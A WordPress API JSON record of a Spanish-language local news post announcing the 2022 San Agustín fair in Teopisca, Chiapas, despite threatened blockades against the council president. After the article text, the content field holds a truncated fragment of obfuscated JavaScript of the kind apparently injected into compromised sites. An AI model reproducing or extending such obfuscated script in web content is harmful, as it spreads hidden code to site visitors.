{"id":4318,"date":"2022-08-12T01:08:53","date_gmt":"2022-08-12T01:08:53","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=4318"},"modified":"2022-08-12T01:08:54","modified_gmt":"2022-08-12T01:08:54","slug":"pese-a-conflictos-realizaran-feria-en-teopisca","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=4318","title":{"rendered":"Pese a conflictos realizar\u00e1n feria en Teopisca"},"content":{"rendered":"\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"621\" height=\"960\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/08\/WhatsApp-Image-2022-08-11-at-1.41.52-PM.jpeg\" alt=\"\" class=\"wp-image-4319\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/08\/WhatsApp-Image-2022-08-11-at-1.41.52-PM.jpeg 621w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/08\/WhatsApp-Image-2022-08-11-at-1.41.52-PM-194x300.jpeg 194w\" sizes=\"auto, (max-width: 621px) 100vw, 621px\" \/><\/figure>\n\n\n\n<p>\u00d3scar G\u00f3mez<\/p>\n\n\n\n<p>San Crist\u00f3bal de Las Casas.-&nbsp; A pesar de las amenazas de bloqueos por pobladores contra el Presidente Concejal de Teopisca, Luis Alberto Valdez D\u00edaz, El comit\u00e9 Cat\u00f3lico y el patronato del anuncio de feria de San Agust\u00edn, anunciaron que este a\u00f1o, habr\u00e1 Feria &nbsp;de San Agust\u00edn Obispo en Teopisca 2022.<\/p>\n\n\n\n<p>En un escrito que hicieron p\u00fablico, dieron a conocer que habr\u00e1 Feria, e invitaron a la comunidad Cat\u00f3lica y sus alrededores al tradicional recorrido de San Agust\u00edn Obispo por las calles principales de Teopisca, as\u00ed como la coronaci\u00f3n de Maury I, como Reina de la feria 2022.<\/p>\n\n\n\n<p>Refieren que el 13 de agosto, se realizar\u00e1 la mudada del santo patrono, y el domingo 14 se realizar\u00e1 una misa y la presentaci\u00f3n de la marimba Arc\u00e1ngeles de la Frontera; el 15 de agosto ser\u00e1 la coronaci\u00f3n de la Reina Maury I, en el parque central.<\/p>\n\n\n\n<p>Las actividades se cerrar\u00e1n con una misa en el templo de San Agust\u00edn y la presentaci\u00f3n del grupo Los S\u00faper Flamazos, en el parque central.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u00d3scar G\u00f3mez San Crist\u00f3bal de Las Casas.-&nbsp; A pesar de las amenazas de bloqueos por pobladores contra el Presidente Concejal de Teopisca, Luis Alberto Valdez D\u00edaz, El comit\u00e9 Cat\u00f3lico y el patronato del anuncio de feria de San Agust\u00edn, anunciaron que este a\u00f1o, habr\u00e1 Feria &nbsp;de San Agust\u00edn Obispo en Teopisca 2022. En un escrito &hellip;<\/p>\n","protected":false},"author":2,"featured_media":4319,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-4318","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/4318","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=4318"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/4318\/revisions"}],"predecessor-version":[{"id":4320,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/4318\/revisions\/4320"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/4319"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=4318"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=4318"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=4318"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}